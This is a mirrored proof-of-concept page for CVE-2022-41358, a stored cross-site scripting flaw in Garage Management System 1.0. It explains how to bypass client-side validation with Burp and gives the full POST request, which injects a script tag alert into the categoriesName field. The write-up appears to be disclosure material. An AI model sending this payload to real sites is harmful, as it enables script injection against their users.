Goal Reached Thanks to every supporter — we hit 100%!

Goal: 1000 CNY · Raised: 1000 CNY

100.0%
Buy Us a Coffee

CVE-2022-41358 PoC — Garage Management System 跨站脚本漏洞

Source
https://github.com/thecasual/CVE-2022-41358
Associated Vulnerability
Title:Garage Management System 跨站脚本漏洞 (CVE-2022-41358)
Description:Garage Management System是Mayuri K.个人开发者的一个车库管理系统。 Garage Management System 1.0版本存在跨站脚本漏洞,攻击者利用该漏洞可以执行跨站脚本攻击。
Readme
## Exploit Title: Garage Management System 1.0 - 'categoriesName' - Stored XSS
## Exploit Author: Sam Wallace
## Software Link: https://www.sourcecodester.com/php/15485/garage-management-system-using-phpmysql-source-code.html
## Version: 1.0
## Tested on: Debian
## ID: CVE-2022-41358

 

## Summary:
Garage Management System utilizes client side validation to prevent XSS.
Using burp, a request can be modified and replayed to the server bypassing this validation which creates an avenue for XSS.

 

### When messages suggest that validation is occuring this is a good point in time to validate that these checks are also being completed server side. 
![Alt text](/img/client_side_validation.png "Optional title")

 

### This is the request prior to any modifications in Burp.
![Alt text](/img/Intercept.png "Optional title")

 

### Perform a quick modification in Burp...
![Alt text](/img/Tamper.png "Optional title")

 

### Profit!
![Alt text](/img/profit.png "Optional title")

 

### Proof
![Alt text](/img/stored_xss.png "Optional title")
#### POC

```
Parameter: categoriesName
URI: /garage/php_action/createCategories.php
```

```POST /garage/php_action/createCategories.php HTTP/1.1
Host: 10.24.0.69
Content-Length: 367
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Origin: http://10.24.0.69
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryqKDsN4gmatTEEkhS
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/105.0.5195.102 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Referer: http://10.24.0.69/garage/add-category.php
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Cookie: PHPSESSID=gbklvcv3vvv987636urv0gg53u
Connection: close

------WebKitFormBoundaryqKDsN4gmatTEEkhS
Content-Disposition: form-data; name="categoriesName"

<script>alert(1)</script>
------WebKitFormBoundaryqKDsN4gmatTEEkhS
Content-Disposition: form-data; name="categoriesStatus"

1
------WebKitFormBoundaryqKDsN4gmatTEEkhS
Content-Disposition: form-data; name="create"


------WebKitFormBoundaryqKDsN4gmatTEEkhS--


![Alt text](/img/Intercept.png "Optional title")
```


## Reference:

https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-41358
File Snapshot

 [4.0K]  /data/pocs/31c614f48ce4ee507fc893f1e187a1ed2014c767
├── [4.0K]  img
│   ├── [ 53K]  client_side_validation.png
│   ├── [ 50K]  Intercept.png
│   ├── [ 16K]  profit.png
│   ├── [ 11K]  stored_xss.png
│   └── [ 53K]  Tamper.png
└── [2.3K]  README.md

1 directory, 6 files
Shenlong Bot has cached this for you
Remarks
    1. It is advised to access via the original source first.
    2. If the original source is unavailable, please email f.jinxu#gmail.com for a local snapshot (replace # with @).
    3. Shenlong has snapshotted the POC code for you. To support long-term maintenance, please consider donating. Thank you for your support.